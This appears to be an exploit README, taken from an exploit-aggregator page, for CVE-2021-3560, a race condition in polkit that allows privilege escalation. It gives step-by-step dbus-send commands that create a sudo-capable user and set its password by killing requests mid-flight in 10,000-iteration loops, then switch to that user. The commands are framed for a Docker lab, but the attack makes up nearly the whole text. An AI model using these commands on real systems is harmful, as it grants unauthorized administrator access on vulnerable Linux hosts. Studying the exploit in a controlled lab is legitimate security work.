Share
## https://sploitus.com/exploit?id=CF3031A3-FE2D-56FC-93ED-3624AE904293
# CVE-2021-3560-Polkit-Privilege-Escalation
by Mark, Qingchen Yu
To build the container with
 ```
docker build -t <image tag of your choice> .
 ```
 To run the container
 ```
docker run -it <image tag name>
 ```

1. start with ``start.sh``
   
2. Measura Execution Time:
   Note the 'real' time and calculate half of it. 
   ```
   time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1
   ```

3. Create a User with Sudo Privileges:
   Replace X.XXX with half of the 'real' time above because we want the process to be interrupted in the middle
   the command will run as a loop of 10000 times
   You may need to run this step several times 
   ```
   for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep X.XXXs; kill $!;done
   ```

4. Check User creation
   ``
   id samurai
   ``
   It should show samurai user exists and show his permissions. Run the step 2 again if not. 

5. Generate Password Hash:
   in this case, password would be 'iamsamurai'
   Note the hash generated. 
   ```
   openssl passwd -5 iamsamurai
   ```

6. Set Password for New User:
   Replace X.XXX with the sleep duration and Password Hash with the hash from step 4. Replace UUUU with the user ID of 'samurai'
   ```
   for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye & sleep X.XXXs; kill $!;done
   ```

7. Switch to new user with the password you created in step 4. 
   ``su - samurai``

   Now  you should be able to use 'sudo with this user'.